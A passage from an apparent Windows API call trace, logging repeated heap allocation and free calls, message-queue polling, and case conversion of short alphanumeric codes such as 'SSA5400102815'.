Size=0x40) returned 0x248d8a0 [0162.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.840] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.842] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.842] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.842] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.842] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.842] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.843] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.843] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.843] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.843] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.843] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.843] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.844] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.844] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.844] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.844] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.845] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.845] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.845] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.845] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.846] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0162.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.846] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.846] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.846] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.847] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0162.847] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bf3c8 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: 